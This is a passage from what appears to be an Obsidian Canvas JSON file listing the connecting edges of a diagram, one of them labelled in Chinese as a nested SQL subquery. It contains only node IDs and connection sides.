		{"id":"1189a70656a3a294","fromNode":"ee91d3ff741ee22a","fromSide":"bottom","toNode":"6fcadfcbee1b31ba","toSide":"top"},
		{"id":"5575e909cadadc8c","fromNode":"409920349830ca5e","fromSide":"bottom","toNode":"112b922442e1dd84","toSide":"top"},
		{"id":"19853d7face04c20","fromNode":"112b922442e1dd84","fromSide":"bottom","toNode":"ccdab5fa6a9ddf5f","toSide":"top"},
		{"id":"cd344cd2c87f626d","fromNode":"8ec1734e2aaa4b96","fromSide":"bottom","toNode":"d17d1913c0b3ed31","toSide":"top"},
		{"id":"25969f9909d114c6","fromNode":"d17d1913c0b3ed31","fromSide":"bottom","toNode":"aefd0da46fb7c652","toSide":"top","label":"嵌套子sql语句"},
		{"id":"5b116ccc1e9a45ea","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"7ce30a3646cae31e","toSide":"top"},
		{"id":"0355068372d42ef5","fromNode":"7ce30a3646cae31e","fromSide":"bottom","toNode":"89bdada7546a41aa","toSide":"top"},
		{"id":"970419ab621c23f2","fromNode":"7ce30a3646cae31e","fromSide":"bottom","toNode":"463d74c4a70ae090","toSide":"top"},
		{"id":"d28a8b545f1691b5","fromNode":"463d74c4a70ae090","fromSide":"bottom","toNode":"68ff66df177f8d15","toSide":"top"},
		{"id":"563e353ba8402fe7","fromNode":"463d74c4a70ae090","fromSide":"bottom","toNode":"22202fd9b91ca55d","toSide":"top"},
		{"id":"bee4563b2e6b52e1","fromNode":"d57b3677cd93029f","fromSide":"bottom","toNode":"6450ba2f5d59ab4d","toSide":"top"},
		{"id":"37ff3108b8c51148","fromNode":"6450ba2f5d59ab4d","fromSide":"bottom","toNode":"31541e3ead504d75","toSide":"top"},
		{"id":"a48a15b0ae2eaef0","fromNode":"d57b3677cd93029f","fromSide":"bottom","toNode":"36d2a7f569b53f1d","toSide":"top"},
		{"id":"8f3864672585728f","fromNode":"4117d03c66f54e0d","fromSide":"bottom","toNode":"2c0f1e45bcb5f702","toSide":"top"},
		{"id":"f638667aab5ba236","fromNode":"2c0f1e45bcb5f702","fromSide":"bottom","toNode":"f378c2be90db729a","toSide":"top"},
		{"id":"b501c69c30c07fa0","fromNode":"2d15dc45806b8594","fromSide":"bottom","toNode":"9fc9f358d244662e","toSide":"top"},
		{"id":"6bf3947da71d646a","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"3421040d56f3f4f5","toSide":"top"},
		{"id":"cdec819cbe817733","fromNode":"3421040d56f3f4f5","fromSide":"bottom","toNode":"471fedbc5c7ba65c","toSide":"top"},
		{"id":"934233ce56c6c042","fromNode":"3421040d56f3f4f5","fromSide":"right","toNode":"89161e2096157135","toSide":"left"},
		{"id":"bce6e1d47c3f4ec4","fromNode":"89161e2096157135","fromSide":"bottom","toNode":"5519f86f5386a80c","toSide":"top"},
		{"id":"f413217c89643c82","fromNode":"aefd0da46fb7c652","fromSide":"bottom","toNode":"a63df04fb6e64d0a","toSide":"top"},
		{"id":"2644d92d3c9e4313","fromNode":"4117d03c66f54e0d","fromSide":"bottom","toNode":"3ba0d0b64e14a822","toSide":"top"},
		{"id":"f2ee96d076b690f7","fromNode":"3ba0d0b64e14a822","fromSide":"bottom","toNode":"e6b7ddcab933feac","toSide":"top"},
		{"id":"1526866ea84b1389","fromNode":"4117d03c66f54e0d","fromSide":"bottom","toNode":"2a6944261e61f9bc","toSide":"top"},
		{"id":"6992bbcc2f339327","fromNode":"2a6944261e61f9bc","fromSide":"bottom","toNode":"4f8b3c8d92181859","toSide":"top"},
		{"id":"0c8dfefde080d311","fromNode":"2a6944261e61f9bc","fromSide":"bottom","toNode":"6450ba2f5d59ab4d","toSide":"top"},
		{"id":"0f8f894d30f158ab","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"192f3ed6acc26bac","toSide":"top"},
		{"id":"eabff0afbad559a2","fromNode":"192f3ed6acc26bac","fromSide":"bottom","toNode":"4b25a39c24e7381f","toSide":"top"},
		{"id":"9ce2a8189c8b9c4d","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"0bf5972a52e5d63d","toSide":"top"},
		{"id":"3802b20080083e17","fromNode":"0bf5972a52e5d63d","fromSide":"bottom","toNode":"c87a0da3e0389509","toSide":"top"},
		{"id":"39b58dcbfd81365f","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"472a67316cd0ad8b","toSide":"top"},
		{"id":"efb2911595459561","fromNode":"472a67316cd0ad8b","fromSide":"bottom","toNode":"95d8f6f0fd4de6c4","toSide":"top"},
		{"id":"d23bb6cc43fe6d48","fromNode":"472a67316cd0ad8b","fromSide":"bottom","toNode":"56149d1f0e77a191","toSide":"top"},
		{"id":"e55445063aa5a798","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"6175bc5a4a6c322d","toSide":"top"},
		{"id":"566fa6e456e6c230","fromNode":"6175bc5a4a6c322d","fromSide":"bottom","toNode":"9ba67c3844d16ca8","toSide":"top"},
		{"id":"757b5a96f4895515","fromNode":"9ba67c3844d16ca8","fromSide":"bottom","toNode":"a0e0ba82e42a13c5","toSide":"top"},
		{"id":"00be3a0d9e654644","fromNode":"d9094a86f54c2c5c","fromSide":"left","toNode":"9ba67c3844d16ca8","toSide":"right"},
		{"id":"4eda179b5967c9ec","fromNode":"9ba67c3844d16ca8","fromSide":"bottom","toNode":"ff93a31c86aafb6b","toSide":"top"},
		{"id":"cf90d822b2adcb79","fromNode":"a0e0ba82e42a13c5","fromSide":"right","toNode":"ff93a31c86aafb6b","toSide":"left"},
		{"id":"b92d1e6dddcf4469","fromNode":"9ba67c3844d16ca8","fromSide":"bottom","toNode":"6deeae418166bea4","toSide":"top"},
		{"id":"0b2dd323b24299e3","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"c03edfbebb5081d5","toSide":"top"},
		{"id":"66c2c5352742f903","fromNode":"0bf5972a52e5d63d","fromSide":"bottom","toNode":"c7ba24ac54b96a6e","toSide":"top"},
		{"id":"2cc2bfd67443151a","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"c688ee0a085e90cf","toSide":"top"},
		{"id":"9abd6c84566382cb","fromNode":"bc5f3345be9bdc22","fromSide":"bottom","toNode":"0fbbe31be950e007","toSide":"top"},
		{"id":"9914818514e19918","fromNode":"c03774d5c4a94f4e","fromSide":"bottom","toNode":"37c921ec10c8ca82","toSide":"top"},
		{"id":"fea7b1442d261e5e","fromNode":"c03774d5c4a94f4e","fromSide":"bottom","toNode":"583be1a0a7897cf8","toSide":"top"},
		{"id":"3b02d6b7e5aa4ef5","fromNode":"583be1a0a7897cf8","fromSide":"bottom","toNode":"35946aef7f040b0a","toSide":"top"},
		{"id":"1a0d06541bd29db6","fromNode":"35946aef7f040b0a","fromSide":"bottom","toNode":"4b2521464382156b","toSide":"top"},
		{"id":"e89a2765676a911c","fromNode":"c03774d5c4a94f4e","fromSide":"bottom","toNode":"8c454a2ea22b8df4","toSide":"top"},
		{"id":"634f1ec8a217c83e","fromNode":"8c454a2ea22b8df4","fromSide":"bottom","toNode":"22f27b0e3b07d2cf","toSide":"top"},
		{"id":"f18130beaa55aeec","fromNode":"35946aef7f040b0a","fromSide":"bottom","toNode":"3db66f66d3a2bece","toSide":"top"},
		{"id":"52d5bdfb5f3f9145","fromNode":"c03774d5c4a94f4e","fromSide":"bottom","toNode":"6d21a2c675207c37","toSide":"top"},
		{"id":"f77378db19463ee9","fromNode":"6d21a2c675207c37","fromSide":"bottom","toNode":"eb40edaf418582dd","toSide":"top"},
		{"id":"b540f305fa0b9bec","fromNode":"583be1a0a7897cf8","fromSide":"bottom","toNode":"91eaf9b50bb5111a","toSide":"top"},
		{"id":"32b33f3de6bc8f0a","fromNode":"583be1a0a7897cf8","fromSide":"bottom","toNode":"4143fae7b3aa5cdb","toSide":"top"},
		{"id":"cbceb384cb94c975","fromNode":"6e871014a8e5dce7","fromSide":"right","toNode":"4143fae7b3aa5cdb","toSide":"left"},
		{"id":"349f7770419662f7","fromNode":"583be1a0a7897cf8","fromSide":"bottom","toNode":"d5ae7df1f759da66","toSide":"top"},
		{"id":"45da45931ca05acc","fromNode":"8c454a2ea22b8df4","fromSide":"bottom","toNode":"151461728bf7daee","toSide":"top"},
		{"id":"0fe66e04d06b5fae","fromNode":"6d21a2c675207c37","fromSide":"bottom","toNode":"4556a6e2671d4862","toSide":"top"},
		{"id":"adf6c3b219987c65","fromNode":"6d21a2c675207c37","fromSide":"bottom","toNode":"d80813d0fd734d54","toSide":"top"},
		{"id":"4c6b3d23d6addc1a","fromNode":"c03774d5c4a94f4e","fromSide":"bottom","toNode":"92a6897b30df7463","toSide":"top"},
		{"id":"61a21d6f110c18ab","fromNode":"8434d019e1cb2ed5","fromSide":"bottom","toNode":"8a2ed63bf4f270c1","toSide":"top"},
		{"id":"53d5bfc54c1cef93","fromNode":"8434d019e1cb2ed5","fromSide":"bottom","toNode":"68fb15ef09bbd328","toSide":"top"},
		{"id":"249af99fd3ac61aa","fromNode":"8434d019e1cb2ed5","fromSide":"bottom","toNode":"4117d03c66f54e0d","toSide":"top"},
		{"id":"96afd3bb9f48cb2d","fromNode":"2c9325c5dd7ccba4","fromSide":"bottom","toNode":"f7813b20b0fdd9fb","toSide":"top"}
	]
}